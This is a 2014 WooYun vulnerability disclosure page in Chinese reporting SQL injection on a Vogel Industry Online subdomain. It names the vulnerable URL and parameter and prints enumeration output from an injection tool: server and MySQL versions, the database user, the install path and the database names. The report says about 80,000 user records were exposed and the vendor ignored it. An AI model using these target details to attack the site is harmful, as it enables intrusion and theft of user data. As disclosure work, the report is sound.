当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082829

漏洞标题:弗戈工业在线分站SQL注入

相关厂商:弗戈工业在线

漏洞作者: 龍 、

提交时间:2014-11-19 15:20

修复时间:2015-01-03 15:22

公开时间:2015-01-03 15:22

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-01-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

8万用户信息泄露

详细说明:

弗戈工业在线
http://lab.vogel.com.cn/

漏洞证明:

QQ图片20141110232849.png


Target: 		http://lab.vogel.com.cn/paper_view.php?id=53326
Host IP: 123.103.15.226
Web Server: Apache/2.2.13 (Unix) DAV/2 PHP/5.2.10
Powered-by: PHP/5.2.10
DB Server: MySQL >=5
Resp. Time(avg): 240 ms
Current User: space@localhost
Sql Version: 5.1.37-log
Current DB: GlobalDB19
System User: space@localhost
Host Name: 123.103.15.226-bj-cnc
Installation dir: /usr/local/mysql3307/
Compile OS: pc-linux-gnu
DB User: 'space'@'localhost'
Data Bases: information_schema
CorpDB19
GlobalDB19
VogelDB
VogelKeyCache
test
vogelmagazine
vogelxweibo

修复方案:

过滤

版权声明:转载请注明来源 龍 、@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝